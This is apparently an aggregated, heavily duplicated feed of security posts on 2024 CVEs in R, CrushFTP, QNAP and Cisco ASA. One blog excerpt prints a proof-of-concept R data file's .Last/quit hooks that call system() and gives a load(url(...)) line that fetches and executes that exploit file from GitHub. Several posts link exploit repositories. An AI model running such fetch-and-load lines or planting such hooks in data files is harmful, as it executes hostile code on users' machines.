-----------------------------------------------Loading R data file in quarantined environment…-----------------------------------------------Loading objects: .Last quit-----------------------------------------Enumerating objects in loaded R data file-----------------------------------------.Last : function (...) - attr(*, "srcref")= 'srcref' int [1:8] 1 13 6 1 13 1 1 6 ..- attr(*, "srcfile")=Classes 'srcfilecopy', 'srcfile' <environment: 0x12cb25f48> quit : function (...) - attr(*, "srcref")= 'srcref' int [1:8] 1 13 6 1 13 1 1 6 ..- attr(*, "srcfile")=Classes 'srcfilecopy', 'srcfile' <environment: 0x12cb25f48> ------------------------------------Functions found: enumerating sources------------------------------------Checking `.Last`…!! `.Last` may execute arbitrary code on your system under certain conditions !!`.Last` source:{ cmd = if (.Platform$OS.type == "windows") "calc.exe" else if (grepl("^darwin", version$os)) "open -a Calculator.app" else "echo pwned\\!" system(cmd)}Checking `quit`…!! `quit` may execute arbitrary code on your system under certain conditions !!`quit` source:{ cmd = if (.Platform$OS.type == "windows") "calc.exe" else if (grepl("^darwin", version$os)) "open -a Calculator.app" else "echo pwned\\!" system(cmd)}
There’s info in the repo on how to use that with Docker.
The big takeaway is (again) to not trust R data files you did not create or know the full provenance of. If you have an internet-facing Shiny app or Plumber API that takes R data files as input, get it off the internet and figure out some other way to take in the input.
While I fully disagree with the assignment of the CVE, I’m at least glad this situation brought attention to this very dangerous aspect of handling this type of file format in R.
##The vulnerability, tagged CVE-2024-27322, can be exploited by tricking someone into loading a maliciously crafted RDS (R Data Serialization) file into an R-based project, or by fooling them into integrating a poisoned R package into a code base. https://www.theregister.com/2024/05/01/r_programming_language_ace_vuln/
##JVNVU#96606632: Rプログラミング言語の実装において、安全でないデータのデシリアライゼーションが発生する問題(CVE-2024-27322) : 👀
---
https://jvn.jp/vu/JVNVU96606632/
A vulnerability (CVE-2024-27322) has been found in R versions 1.4.0 to 4.3.3. It's patched in 4.4.0 (24 April 2024), so you will be wanting to upgrade. #RStats
https://www.kb.cert.org/vuls/id/238194
@hrbrmstr @joranelias @Lluis_Revilla @brodriguesco @idavydov Right, it’s as much “expected behaviour” as in CVE-2024-27322, and as in other serialisation engines (e.g. Python pickle, .net BinaryFormatter, etc.). Which are all systems that are very hard to use correctly, and cause frequent direct vulnerabilities. Whether that makes the serialisation frameworks themselves a vulnerability… 🤷
(I did not register a CVE; for me this is an issue of awareness and documentation.)
##@klmr @Lluis_Revilla I do agree that if you exploit a bug in the RDS parser and cause code execution this way, that's a terrible bug that must be fixed ASAP. But you can also, besides unserializing a promise, unserialize a lot of other well-formed things that would execute code upon being evaluated or printed, and that's R working by design. CVE-2024-27322 does not overflow stack or use-after-free in the parser, it just unserializes a promise. R's lazy evaluation relies on promises being serializable.
It would be great to have a safe (un-)serialization function, but the current system by itself doesn't deserve a CVE.
##CVE-2024-27322, if you missed this:. #cybersecurity #infosec
Vulnerability in R Programming Language Enables Supply Chain Attacks https://www.securityweek.com/vulnerability-in-r-programming-language-enables-supply-chain-attacks/ @SecurityWeek
##The CVE-2024-27322 security vulnerability in R's deserialization process gives attackers a way to execute arbitrary code in target environments via specially crafted files. https://www.darkreading.com/application-security/r-programming-language-exposes-orgs-to-supply-chain-risk
##🚨Looks like #RStats was not immune to deserialization bugs after all https://hiddenlayer.com/research/r-bitrary-code-execution/
Watch those R Data files (and, we now shld come up with better ways to ensure local R library integrity)!!
CVE-2024-27322
##I ended up having to burn time I honestly don't have this week to blog the stuff from the repo I made yesterday due to CERT and CISA making a big deal (https://www.cisa.gov/news-events/alerts/2024/05/01/certcc-reports-r-programming-language-vulnerability) out of expected behavior in #RStats due to a daft, hype-seeking vendor.
The profession that is cybersecurity is stupid broken.
I rly want (someone) to pwn an org with this CVE just to get it on KEV for sad posterity.
##I had not planned to blog this (this is an incredibly time-crunched week for me) but CERT/CC and CISA made a big deal out of a non-vulnerability in R, and it’s making the round on socmed, so here we are.
A security vendor decided to try to get some hype before 2024 RSAC and made a big deal out of what was/is known expected behavior in R data files. R Core took some measures to address the issue they outlined, but for the love of Henry, PLEASE do not think R data files are safe to handle if you weren’t the one creating them, or you do not fully know the provenance of them.
Konrad Rudolph and Iakov Davydov did some ace cyber sleuthing and figured out other ways R data file deserialization can be abused. Please take a moment and drop a note on Mastodon to them saying “thank you”. This is excellent work. We need more folks like them in this ecosystem.
Like many programming languages, R has many footguns, and R data files are one of them. R objects are wonderful beasts, and being able to serialize and deserialize those beasts is a super helpful bit of functionality. Also, R has something called active bindings. Amongst other things, they let you access an object to get a value, but — in doing so — code can get executed without you knowing it. Whether an R data file has an object with active bindings or not, it can be abused by attackers.
When you load()
an R data file directly into your R session and into the global environment, the object(s) in it will, well, load there. So, if it has an object named print
that’s going to be in your global environment and get called when print()
gets called. Lather/rinse/repeat for any other object name. It should be pretty obvious how this could be abused.
A tad more insidious is what happens when you quit R. By default, on quit()
, unless you specify otherwise, that function invocation will also call .Last()
if it exists in the environment. This functionality exists in the event things need to be cleaned up. One “nice” aspect of .
-prefixed R objects is that they’re hidden by default from the environment. So, you may not even notice if an R data file you’ve loaded has that defined. (You likely do not check what’s loaded anyway.)
It’s also possible to create custom R objects that have their own “finalizers” (ref reg.finalizer
), which will also get called by default when the objects are being destroyed on quit.
There are also likely other ways to trigger unwanted behavior.
If you want to see how this works, start R from RStudio, the command line, or R GUI. Then, execute the following R code:
load(url("https://github.com/hrbrmstr/rdaradar/raw/main/exploit.rda"))
Then, quit R/RStudio/R GUI (this will be less dramatic on linux, but the demo should still be effective).
If you must take in untrusted R data files, keep reading.
I threw together an R script along with a safer way to use it (a Docker container) to help R folks inspect the contents of R data files before actually using them. It also looks for some basic shady stuff and alerts you if it finds them. It’s a WIP, and issues + thoughtful PRs are welcome.
If one were to run Rscript check.R
from that repo with that exploit.rda
file as a parameter, one would see this:
-----------------------------------------------Loading R data file in quarantined environment…-----------------------------------------------Loading objects: .Last quit-----------------------------------------Enumerating objects in loaded R data file-----------------------------------------.Last : function (...) - attr(*, "srcref")= 'srcref' int [1:8] 1 13 6 1 13 1 1 6 ..- attr(*, "srcfile")=Classes 'srcfilecopy', 'srcfile' <environment: 0x12cb25f48> quit : function (...) - attr(*, "srcref")= 'srcref' int [1:8] 1 13 6 1 13 1 1 6 ..- attr(*, "srcfile")=Classes 'srcfilecopy', 'srcfile' <environment: 0x12cb25f48> ------------------------------------Functions found: enumerating sources------------------------------------Checking `.Last`…!! `.Last` may execute arbitrary code on your system under certain conditions !!`.Last` source:{ cmd = if (.Platform$OS.type == "windows") "calc.exe" else if (grepl("^darwin", version$os)) "open -a Calculator.app" else "echo pwned\\!" system(cmd)}Checking `quit`…!! `quit` may execute arbitrary code on your system under certain conditions !!`quit` source:{ cmd = if (.Platform$OS.type == "windows") "calc.exe" else if (grepl("^darwin", version$os)) "open -a Calculator.app" else "echo pwned\\!" system(cmd)}
There’s info in the repo on how to use that with Docker.
FIN
The big takeaway is (again) to not trust R data files you did not create or know the full provenance of. If you have an internet-facing Shiny app or Plumber API that takes R data files as input, get it off the internet and figure out some other way to take in the input.
While I fully disagree with the assignment of the CVE, I’m at least glad this situation brought attention to this very dangerous aspect of handling this type of file format in R.
##As has been making the rounds, R version 4.4.0 patched a security issue:
https://hiddenlayer.com/research/r-bitrary-code-execution/
https://www.kb.cert.org/vuls/id/238194
https://nvd.nist.gov/vuln/detail/CVE-2024-27322
However, as noted on R-help, the issue runs much deeper:
https://stat.ethz.ch/pipermail/r-help/2024-May/479281.html
If I understand this correctly, avoiding external .rdata/.rds files from untrusted sources seems prudent.
##The vulnerability, tagged CVE-2024-27322, can be exploited by tricking someone into loading a maliciously crafted RDS (R Data Serialization) file into an R-based project, or by fooling them into integrating a poisoned R package into a code base. https://www.theregister.com/2024/05/01/r_programming_language_ace_vuln/
##JVNVU#96606632: Rプログラミング言語の実装において、安全でないデータのデシリアライゼーションが発生する問題(CVE-2024-27322) : 👀
---
https://jvn.jp/vu/JVNVU96606632/
Update your Rs!
4.4.0 patched CVE-2024-27322, detailed below:
https://www.theregister.com/2024/05/01/r_programming_language_ace_vuln/
##A vulnerability (CVE-2024-27322) has been found in R versions 1.4.0 to 4.3.3. It's patched in 4.4.0 (24 April 2024), so you will be wanting to upgrade. #RStats
https://www.kb.cert.org/vuls/id/238194
@hrbrmstr @joranelias @Lluis_Revilla @brodriguesco @idavydov Right, it’s as much “expected behaviour” as in CVE-2024-27322, and as in other serialisation engines (e.g. Python pickle, .net BinaryFormatter, etc.). Which are all systems that are very hard to use correctly, and cause frequent direct vulnerabilities. Whether that makes the serialisation frameworks themselves a vulnerability… 🤷
(I did not register a CVE; for me this is an issue of awareness and documentation.)
##CVE-2024-27322, if you missed this:. #cybersecurity #infosec
Vulnerability in R Programming Language Enables Supply Chain Attacks https://www.securityweek.com/vulnerability-in-r-programming-language-enables-supply-chain-attacks/ @SecurityWeek
##The CVE-2024-27322 security vulnerability in R's deserialization process gives attackers a way to execute arbitrary code in target environments via specially crafted files. https://www.darkreading.com/application-security/r-programming-language-exposes-orgs-to-supply-chain-risk
##🚨Looks like #RStats was not immune to deserialization bugs after all https://hiddenlayer.com/research/r-bitrary-code-execution/
Watch those R Data files (and, we now shld come up with better ways to ensure local R library integrity)!!
CVE-2024-27322
##updated 2024-04-29T09:31:52
1 posts
3 repos
https://github.com/truonghuuphuc/CVE-2024-27956
https://github.com/diego-tella/CVE-2024-27956-RCE
https://github.com/X-Projetion/CVE-2024-27956-WORDPRESS-RCE-PLUGIN
Hackers Exploit WP-Automatic Plugin Vulnerability, Threatening WordPress Site Security https://thecyberexpress.com/wp-automatic-plugin-vulnerability/ #WPAutomaticpluginvulnerabilities #WPAutomaticPluginVulnerability #criticalvulnerability #TheCyberExpressNews #WPAutomaticplugin #Vulnerabilities #TheCyberExpress #FirewallDaily #CVE202427956
##updated 2024-04-26T15:32:22.523000
2 posts
QNAP security advisory: Multiple Vulnerabilities in QTS, QuTS hero, QuTScloud, myQNAPcloud, and myQNAPcloud Link (PWN2OWN 2023)
QNAP added 3 additional CVEs to a 09 March 2024 advisory: CVE-2024-27124, CVE-2024-32764 and CVE-2024-32766. QNAP hid the CVSSv3 scores, which isn't surprising given how disgustingly severe they were. No mention of exploitation.
#QNAP #vulnerability #CVE_2024_27124 #CVE_2024_32764 #CVE_2024_32766
##QNAP security advisory: Multiple Vulnerabilities in QTS, QuTS hero, QuTScloud, myQNAPcloud, and myQNAPcloud Link (PWN2OWN 2023)
QNAP added 3 additional CVEs to a 09 March 2024 advisory: CVE-2024-27124, CVE-2024-32764 and CVE-2024-32766. QNAP hid the CVSSv3 scores, which isn't surprising given how disgustingly severe they were. No mention of exploitation.
#QNAP #vulnerability #CVE_2024_27124 #CVE_2024_32764 #CVE_2024_32766
##updated 2024-04-26T15:32:22.523000
2 posts
QNAP security advisory: Multiple Vulnerabilities in QTS, QuTS hero, QuTScloud, myQNAPcloud, and myQNAPcloud Link (PWN2OWN 2023)
QNAP added 3 additional CVEs to a 09 March 2024 advisory: CVE-2024-27124, CVE-2024-32764 and CVE-2024-32766. QNAP hid the CVSSv3 scores, which isn't surprising given how disgustingly severe they were. No mention of exploitation.
#QNAP #vulnerability #CVE_2024_27124 #CVE_2024_32764 #CVE_2024_32766
##QNAP security advisory: Multiple Vulnerabilities in QTS, QuTS hero, QuTScloud, myQNAPcloud, and myQNAPcloud Link (PWN2OWN 2023)
QNAP added 3 additional CVEs to a 09 March 2024 advisory: CVE-2024-27124, CVE-2024-32764 and CVE-2024-32766. QNAP hid the CVSSv3 scores, which isn't surprising given how disgustingly severe they were. No mention of exploitation.
#QNAP #vulnerability #CVE_2024_27124 #CVE_2024_32764 #CVE_2024_32766
##updated 2024-04-26T15:30:39
2 posts
1 repos
QNAP security advisory: Multiple Vulnerabilities in QTS, QuTS hero, QuTScloud, myQNAPcloud, and myQNAPcloud Link (PWN2OWN 2023)
QNAP added 3 additional CVEs to a 09 March 2024 advisory: CVE-2024-27124, CVE-2024-32764 and CVE-2024-32766. QNAP hid the CVSSv3 scores, which isn't surprising given how disgustingly severe they were. No mention of exploitation.
#QNAP #vulnerability #CVE_2024_27124 #CVE_2024_32764 #CVE_2024_32766
##QNAP security advisory: Multiple Vulnerabilities in QTS, QuTS hero, QuTScloud, myQNAPcloud, and myQNAPcloud Link (PWN2OWN 2023)
QNAP added 3 additional CVEs to a 09 March 2024 advisory: CVE-2024-27124, CVE-2024-32764 and CVE-2024-32766. QNAP hid the CVSSv3 scores, which isn't surprising given how disgustingly severe they were. No mention of exploitation.
#QNAP #vulnerability #CVE_2024_27124 #CVE_2024_32764 #CVE_2024_32766
##updated 2024-04-26T15:25:47.270000
27 posts
9 repos
https://github.com/Mohammaddvd/CVE-2024-4040
https://github.com/rbih-boulanouar/CVE-2024-4040
https://github.com/airbus-cert/CVE-2024-4040
https://github.com/gotr00t0day/CVE-2024-4040
https://github.com/Praison001/CVE-2024-4040-CrushFTP-server
https://github.com/jakabakos/CVE-2024-4040-CrushFTP-File-Read-vulnerability
https://github.com/tucommenceapousser/CVE-2024-4040-Scanner
CrushFTP VFS Sandbox Escape Vulnerability (CVE-2024-4040) https://fortiguard.fortinet.com/threat-signal-report/5431
##Rapid7 now has a full technical analysis of #CrushFTP CVE-2024-4040 available in AttackerKB (with many thanks to @fuzz for the great work!) https://attackerkb.com/topics/20oYjlmfXa/cve-2024-4040/rapid7-analysis
##While everyone's freaking out about Cisco, CISA added CrushFTP's actively exploited zero-day CVE-2024-4040 to the Known Exploited Vulnerabilities (KEV) Catalog: 🔗 https://www.cisa.gov/news-events/alerts/2024/04/24/cisa-adds-three-known-exploited-vulnerabilities-catalog
#zeroday #vulnerability #CVE_2024_4040 #CrushFTP #eitw #activeexploitation #CISA #KnownExploitedVulnerabilitiesCatalog
##@h4sh I'm unfamiliar with the CVE process. NVD's information hasn't updated yet, which I assume eventually updates from cve.org. Do you know when NVD's information will reflect cve.org's? @todb
##Due to new information, CVE-2024-4040 is now an unauthenticated remote code execution via template injection (CVSS 9.8). Multiple sources of new information have confirmed this. The CVE record has been updated.
https://www.cve.org/CVERecord?id=CVE-2024-4040
> A server side template injection vulnerability in CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows unauthenticated remote attackers to read files from the filesystem outside of the VFS Sandbox, bypass authentication to gain administrative access, and perform remote code execution on the server.
##Rapid7 researcher @fuzz analyzed #CrushFTP CVE-2024-4040 and found that it's not only exploitable for arbitrary file read as root, but also authentication bypass for admin access and full RCE. Patch immediately. https://www.rapid7.com/blog/post/2024/04/23/etr-unauthenticated-crushftp-zero-day-enables-complete-server-compromise/
##@h4sh Rapid7 has a much more severe analysis of CVE-2024-4040, the actively exploited CrushFTP zero-day. 🔗 https://www.rapid7.com/blog/post/2024/04/23/etr-unauthenticated-crushftp-zero-day-enables-complete-server-compromise/
Rapid7’s vulnerability research team analyzed CVE-2024-4040 and determined that it is fully unauthenticated and trivially exploitable; successful exploitation allows for not only arbitrary file read as root, but also authentication bypass for administrator account access and full remote code execution. Successful exploitation allows a remote, unauthenticated attacker to access and potentially exfiltrate all files stored on the CrushFTP instance.
Although the vulnerability has been formally described as an arbitrary file read, Rapid7 believes that it can be more accurately categorized as a server-side template injection (SSTI).
#zeroday #vulnerability #CVE_2024_4040 #CrushFTP #eitw #activeexploitation
##Exploit from airbus-cert is out for #crushFTP CVE-2024-4040
Expect more in the wild exploitation in the coming days.. https://infosec.exchange/@wvu/112320211100310152
##h/t @JohnHammond https://github.com/airbus-cert/CVE-2024-4040
##CrushFTP zero-day exploited by attackers, upgrade immediately! (CVE-2024-4040) https://www.helpnetsecurity.com/2024/04/23/cve-2024-4040/ #CrowdStrike #enterprise #Don'tmiss #Hotstuff #CrushFTP #exploit #Censys #News #CVE #FTP
##Here's a #nuclei template to detect potentially unpatched #CrushFTP 10.x servers against CVE-2024-4040.
Note that the templates do NOT exploit the vuln and are not remotely related to a POC. Attackers will likely find these useless because they are.
##@campuscodi Kudos to @h4sh for assigning the CVE to the actively exploited CrushFTP zero-day: https://infosec.exchange/@h4sh/112316550866303546
According to his analysis and patch diffing, the CVSSv3 score for CVE-2024-4040 is 7.7 HIGH: Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
Did some patch diffing on the new #crushFTP bug, and it does look like the bug has 2 components and at least one of them need some form of authentication to exploit (need creation of something).
After the first stage, the reading of the file outside of VFS sandbox might not need authentication. I am not sure.
#CrushFTP #zeroday #vulnerability #CVE_2024_4040 #eitw #activeexploitation
##The CrushFTP zero-day is now CVE-2024-4040
##Shoutout to @h4sh for getting a CVE ID assigned to this actively exploited zero-day CrushFTP vulnerability: CVE-2024-4040 (reported by Simon Garrelou, of Airbus CERT). https://www.cve.org/CVERecord?id=CVE-2024-4040
VFS Sandbox Escape in CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows remote attackers with low privileges to read files from the filesystem outside of VFS Sandbox.
#zeroday #eitw #activeexploitation #CrushFTP #vulnerability #CVE_2024_4040
##I bring you CVE-2024-4040: VFS Sandbox Escape in #CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows remote attackers with low privileges to read files from the filesystem outside of VFS Sandbox.
https://www.cve.org/CVERecord?id=CVE-2024-4040
If anyone disagrees with our CVSS analysis, please let me know & bring proof
##Rapid7 now has a full technical analysis of #CrushFTP CVE-2024-4040 available in AttackerKB (with many thanks to @fuzz for the great work!) https://attackerkb.com/topics/20oYjlmfXa/cve-2024-4040/rapid7-analysis
##@h4sh I'm unfamiliar with the CVE process. NVD's information hasn't updated yet, which I assume eventually updates from cve.org. Do you know when NVD's information will reflect cve.org's? @todb
##Due to new information, CVE-2024-4040 is now an unauthenticated remote code execution via template injection (CVSS 9.8). Multiple sources of new information have confirmed this. The CVE record has been updated.
https://www.cve.org/CVERecord?id=CVE-2024-4040
> A server side template injection vulnerability in CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows unauthenticated remote attackers to read files from the filesystem outside of the VFS Sandbox, bypass authentication to gain administrative access, and perform remote code execution on the server.
##Rapid7 researcher @fuzz analyzed #CrushFTP CVE-2024-4040 and found that it's not only exploitable for arbitrary file read as root, but also authentication bypass for admin access and full RCE. Patch immediately. https://www.rapid7.com/blog/post/2024/04/23/etr-unauthenticated-crushftp-zero-day-enables-complete-server-compromise/
##@h4sh Rapid7 has a much more severe analysis of CVE-2024-4040, the actively exploited CrushFTP zero-day. 🔗 https://www.rapid7.com/blog/post/2024/04/23/etr-unauthenticated-crushftp-zero-day-enables-complete-server-compromise/
Rapid7’s vulnerability research team analyzed CVE-2024-4040 and determined that it is fully unauthenticated and trivially exploitable; successful exploitation allows for not only arbitrary file read as root, but also authentication bypass for administrator account access and full remote code execution. Successful exploitation allows a remote, unauthenticated attacker to access and potentially exfiltrate all files stored on the CrushFTP instance.
Although the vulnerability has been formally described as an arbitrary file read, Rapid7 believes that it can be more accurately categorized as a server-side template injection (SSTI).
#zeroday #vulnerability #CVE_2024_4040 #CrushFTP #eitw #activeexploitation
##Exploit from airbus-cert is out for #crushFTP CVE-2024-4040
Expect more in the wild exploitation in the coming days.. https://infosec.exchange/@wvu/112320211100310152
##h/t @JohnHammond https://github.com/airbus-cert/CVE-2024-4040
##Here's a #nuclei template to detect potentially unpatched #CrushFTP 10.x servers against CVE-2024-4040.
Note that the templates do NOT exploit the vuln and are not remotely related to a POC. Attackers will likely find these useless because they are.
##@campuscodi Kudos to @h4sh for assigning the CVE to the actively exploited CrushFTP zero-day: https://infosec.exchange/@h4sh/112316550866303546
According to his analysis and patch diffing, the CVSSv3 score for CVE-2024-4040 is 7.7 HIGH: Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
Did some patch diffing on the new #crushFTP bug, and it does look like the bug has 2 components and at least one of them need some form of authentication to exploit (need creation of something).
After the first stage, the reading of the file outside of VFS sandbox might not need authentication. I am not sure.
#CrushFTP #zeroday #vulnerability #CVE_2024_4040 #eitw #activeexploitation
##The CrushFTP zero-day is now CVE-2024-4040
##Shoutout to @h4sh for getting a CVE ID assigned to this actively exploited zero-day CrushFTP vulnerability: CVE-2024-4040 (reported by Simon Garrelou, of Airbus CERT). https://www.cve.org/CVERecord?id=CVE-2024-4040
VFS Sandbox Escape in CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows remote attackers with low privileges to read files from the filesystem outside of VFS Sandbox.
#zeroday #eitw #activeexploitation #CrushFTP #vulnerability #CVE_2024_4040
##I bring you CVE-2024-4040: VFS Sandbox Escape in #CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows remote attackers with low privileges to read files from the filesystem outside of VFS Sandbox.
https://www.cve.org/CVERecord?id=CVE-2024-4040
If anyone disagrees with our CVSS analysis, please let me know & bring proof
##updated 2024-04-26T15:25:02.773000
54 posts
2 repos
https://github.com/west-wind/Threat-Hunting-With-Splunk
https://github.com/Garvard-Agency/CVE-2024-20359-CiscoASA-FTD-exploit
Censys: Analysis of ArcaneDoor Threat Infrastructure Suggests Potential Ties to Chinese-based Actor
After the Cisco zero-days from last week (CVE-2024-20353 which is 8.6 high, and CVE-2024-20359 at 6.0 medium, disclosed 24 April 2024 by Cisco as exploited zero-days), Censys investigated the actor-controlled IPs provided by Talos in Censys data and cross-referenced the with other certificate indicators. They discovered "compelling data" suggesting the potential involvement of a China-based actor, including links to multiple major Chinese networks and the presence of Chinese-developed anti-censorship software. Cisco didn't outright say China, but Censys has.
#Cisco #activeexploitation #eitw #CVE_2024_20353 #CVE_2024_20359 #UAT4356 #threatintel
##The hubbub about Cisco is winding down, but in case you are handling an active security incident, Computer Incident Response Center Luxembourg (CIRCL) recommended users of Cisco ASA equipment follow the Cisco ASA Forensic Investigation Procedures for First Responders.
This document was created 19 August 2019 and revised 3 times (latest 25 January 2024) by the original author, so it is certainly reliable.
It outlines a number of commands that can be run to gather evidence for an investigation along with the respective output that should be collected upon running these commands. This document also provides information on how to perform integrity checks on an ASA’s system images, and includes a procedure for collecting a core file/memory dump from an ASA device.
#Cisco #CVE_2024_20353 #CVE_2024_20359 #activeexploitation #IR #DFIR #eitw
##The Canadian Centre for Cyber Security has issued a detailed security advisory regarding the "LINE DANCER" & "LINE RUNNER" attacks against Cisco ASA devices by what it believes are nation-state sponsored malicious actors.
As usual, if you or your organization runs Cisco ASAs, time to patch to mitigate these vulnerabilities.
www.cyber.gc.ca/en/news-events/cyber-activity-impacting-cisco-asa-vpns
#infosec #cybersecurity #LINEDANCER #LINERUNNER #ARCANEDOOR #Cisco #CiscoASA #SecurityAdvisory #CVE_2024_20359 #CVE_2024_20353
Just a reminder that while we are up to 3 CVEs for the #Cisco #ArcaneDoor attack, we still don't know what the initial access to these devices was.
If I were a very strategic purchaser, I'd be thinking about what it would look like to replace any Cisco gear on my perimeter. Just in case.
blog.talosintelligence.com/arcanedoor-new-espionage-focused-campaign-found-targeting-perimeter-network-devices/
#CVE_2024_20353 #CVE_2024_20358 #CVE_2024_20359
Australian Cyber Security Centre (ACSC) of Australian Signals Directorate (ASD) issued a cybersecurity alert 🔗 Exploitation of vulnerabilities affecting Cisco firewall platforms. The important points are that they are aware of activity impacting Cisco ASA devices in Australia and can confirm that some Cisco ASA devices in Australia have been compromised. They refer to the jointly co-authored advisory hosted on CCCS's website: Cyber Activity Impacting CISCO ASA VPNs
#Cisco #ASA #zeroday #vulnerability #eitw #activeexploitation #CVE_2024_20353 #CVE_2024_20359 #China #cyberespionage #threatintel #IOC #UAT4356 #CISA #KnownExploitedVulnerabilitiesCatalog #KEV
##So, if you think you've maybe got #ArcaneDoor / #LineDancer issues on your ASA (discovery methods here: https://blog.talosintelligence.com/arcanedoor-new-espionage-focused-campaign-found-targeting-perimeter-network-devices/), first things first:
"When following these procedures first responders should NOT attempt to collect a core dump (Step 5) or reboot the device if they believe that the device has been compromised, based on the lina memory region output."
This thing runs in (hard to reach) memory, and hooks smartly, so it will be gone and your collection will have failed.
What you should do is (I'll quote):
- Log in to the suspect device CLI. Note: On devices that are running Cisco FTD Software, change into the Cisco ASA CLI using the system support
diagnostic-cli
command.- Use the
enable
command to change into privileged EXEC mode.Note: On devices that are running Cisco FTD Software, the enable password is blank.- Collect the outputs of the following commands:
show version
verify /SHA-512 system:memory/text
debug menu memory 8
- Open a case with the Cisco Technical Assistance Center (TAC, https://www.cisco.com/c/en/us/support/index.html). In the case, reference the keyword ArcaneDoor and upload the data that was collected in Step 3.
Secondly, although you should patch (after establishing you have not been compromised), the two patches mentioned won't protect you from the getting reinfected.
I will repeat (without shouting this time):
"We have not determined the initial access vector used in this campaign. We have not identified evidence of pre-authentication exploitation to date."
There did pop up a third CVE (#CVE_2024_20358) in between the Talos publication and the CISCO advisory page (https://sec.cloudapps.cisco.com/security/center/resources/asa_ftd_attacks_event_response), but it is also local (not "network"), so I guess that won't safe anyone from reinfection either. But that's just me guessing.
#CVE_2024_20359 #CVE_2024_20353 #infosec #cybersecurity
Final question for anyone still reading: why the debug menu memory 8
? What does it do?
I take back everything bad I said about NCSC-UK yesterday. They released lengthy malware analysis reports on both malware:
cc: @todb @campuscodi @mttaggart @DaveMWilburn
#cisco #ASA #zeroday #vulnerability #eitw #activeexploitation #CVE_2024_20353 #CVE_2024_20359 #China #cyberespionage #threatintel #IOC #UAT4356
##The Canadian Centre for Cyber Security CCCS has a security advisory for the Cisco zero-days and exploitation. It includes backgrounddetails from CCCS's perspective, artifact information about the LINE RUNNER and LINE DANCER malware, indicators of compromise, and recommanded actions: 🔗
https://www.cyber.gc.ca/en/news-events/cyber-activity-impacting-cisco-asa-vpns
#cisco #ASA #zeroday #vulnerability #eitw #activeexploitation #CVE_2024_20353 #CVE_2024_20359 #China #cyberespionage #threatintel #IOC #UAT4356
##The #Cisco vulns today smack a little of the Barracuda ones last year.
I really hope we don't end at "Toss these ASAs into a volcano."
#CVE_2024_20353 #CVE_2024_20359
@todb @briankrebs @campuscodi @jwarminsky @jgreig @mttaggart
HOT OFF THE PRESS!! CISA adds CVE-2024-202353 and CVE-2024-202359 to the Known Exploited Vulnerabilities (KEV) Catalog. 🔗 https://www.cisa.gov/news-events/alerts/2024/04/24/cisa-adds-three-known-exploited-vulnerabilities-catalog
See original toot above for information on the Cisco exploited zero-days.
#Cisco #zeroday #vulnerability #activeexploitation #eitw #CVE_2024_20353 #CVE_2024_20359 #KEV #CISA #KnownExploitedVulnerabilitiesCatalog
##Censys: Analysis of ArcaneDoor Threat Infrastructure Suggests Potential Ties to Chinese-based Actor
After the Cisco zero-days from last week (CVE-2024-20353 which is 8.6 high, and CVE-2024-20359 at 6.0 medium, disclosed 24 April 2024 by Cisco as exploited zero-days), Censys investigated the actor-controlled IPs provided by Talos in Censys data and cross-referenced the with other certificate indicators. They discovered "compelling data" suggesting the potential involvement of a China-based actor, including links to multiple major Chinese networks and the presence of Chinese-developed anti-censorship software. Cisco didn't outright say China, but Censys has.
#Cisco #activeexploitation #eitw #CVE_2024_20353 #CVE_2024_20359 #UAT4356 #threatintel
##The hubbub about Cisco is winding down, but in case you are handling an active security incident, Computer Incident Response Center Luxembourg (CIRCL) recommended users of Cisco ASA equipment follow the Cisco ASA Forensic Investigation Procedures for First Responders.
This document was created 19 August 2019 and revised 3 times (latest 25 January 2024) by the original author, so it is certainly reliable.
It outlines a number of commands that can be run to gather evidence for an investigation along with the respective output that should be collected upon running these commands. This document also provides information on how to perform integrity checks on an ASA’s system images, and includes a procedure for collecting a core file/memory dump from an ASA device.
#Cisco #CVE_2024_20353 #CVE_2024_20359 #activeexploitation #IR #DFIR #eitw
##The Canadian Centre for Cyber Security has issued a detailed security advisory regarding the "LINE DANCER" & "LINE RUNNER" attacks against Cisco ASA devices by what it believes are nation-state sponsored malicious actors.
As usual, if you or your organization runs Cisco ASAs, time to patch to mitigate these vulnerabilities.
www.cyber.gc.ca/en/news-events/cyber-activity-impacting-cisco-asa-vpns
#infosec #cybersecurity #LINEDANCER #LINERUNNER #ARCANEDOOR #Cisco #CiscoASA #SecurityAdvisory #CVE_2024_20359 #CVE_2024_20353
Just a reminder that while we are up to 3 CVEs for the #Cisco #ArcaneDoor attack, we still don't know what the initial access to these devices was.
If I were a very strategic purchaser, I'd be thinking about what it would look like to replace any Cisco gear on my perimeter. Just in case.
blog.talosintelligence.com/arcanedoor-new-espionage-focused-campaign-found-targeting-perimeter-network-devices/
#CVE_2024_20353 #CVE_2024_20358 #CVE_2024_20359
Australian Cyber Security Centre (ACSC) of Australian Signals Directorate (ASD) issued a cybersecurity alert 🔗 Exploitation of vulnerabilities affecting Cisco firewall platforms. The important points are that they are aware of activity impacting Cisco ASA devices in Australia and can confirm that some Cisco ASA devices in Australia have been compromised. They refer to the jointly co-authored advisory hosted on CCCS's website: Cyber Activity Impacting CISCO ASA VPNs
#Cisco #ASA #zeroday #vulnerability #eitw #activeexploitation #CVE_2024_20353 #CVE_2024_20359 #China #cyberespionage #threatintel #IOC #UAT4356 #CISA #KnownExploitedVulnerabilitiesCatalog #KEV
##So, if you think you've maybe got #ArcaneDoor / #LineDancer issues on your ASA (discovery methods here: https://blog.talosintelligence.com/arcanedoor-new-espionage-focused-campaign-found-targeting-perimeter-network-devices/), first things first:
DO NOT REBOOT OR CRASH DUMP YOUR DEVICE (sorry for shouting)
"When following these procedures first responders should NOT attempt to collect a core dump (Step 5) or reboot the device if they believe that the device has been compromised, based on the lina memory region output."
This thing runs in (hard to reach) memory, and hooks smartly, so it will be gone and your collection will have failed.
What you should do is (I'll quote):
- Log in to the suspect device CLI. Note: On devices that are running Cisco FTD Software, change into the Cisco ASA CLI using the system support
diagnostic-cli
command.- Use the
enable
command to change into privileged EXEC mode.Note: On devices that are running Cisco FTD Software, the enable password is blank.- Collect the outputs of the following commands:
show version
verify /SHA-512 system:memory/text
debug menu memory 8
